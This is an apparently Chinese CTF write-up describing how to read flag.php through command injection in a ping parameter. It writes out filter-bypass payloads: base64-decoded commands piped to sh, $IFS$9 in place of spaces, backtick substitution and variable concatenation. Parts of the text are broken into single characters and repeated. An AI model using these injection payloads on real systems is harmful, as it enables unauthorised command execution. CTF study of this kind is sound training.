方法一,base64
取下来,可以ping通
用&试试
不行
用封号试试,可以了,有个flag.php
用base64编码试试
echo Y2F0IGtleS50eHQ=|base64 -d|sh
说不能有空格
用${IFS}
或者$IFS$9
绕过,用到
I
F
S
的时候,又显示不能有符号
!
[
在这里插入图片描述
]
(
h
t
t
p
s
:
/
/
i
m
g
−
b
l
o
g
.
c
s
d
n
i
m
g
.
c
n
/
1
c
d
61773449445
e
5
b
0
c
9
d
301248619
c
4.
p
n
g
)
换成用
‘
{IFS}的时候,又显示不能有符号 ![在这里插入图片描述](https://img-blog.csdnimg.cn/1cd61773449445e5b0c9d301248619c4.png) 换成用`
IFS的时候,又显示不能有符号![在这里插入图片描述](https://img−blog.csdnimg.cn/1cd61773449445e5b0c9d301248619c4.png)换成用‘IFS$9`
经过一系列尝试时候,发现过滤了
好像可以了
补充一句
用bash的时候bash也被过滤了
方法二:内联
?ip=127.0.0.1;cat$IFS$9`ls`
查看源码
方法三、拼接绕过
这样发现不行
a跟b换个位置就可以了
?ip=127.0.0.1;b=ag.php;a=fl;cat$IFS$9$a$b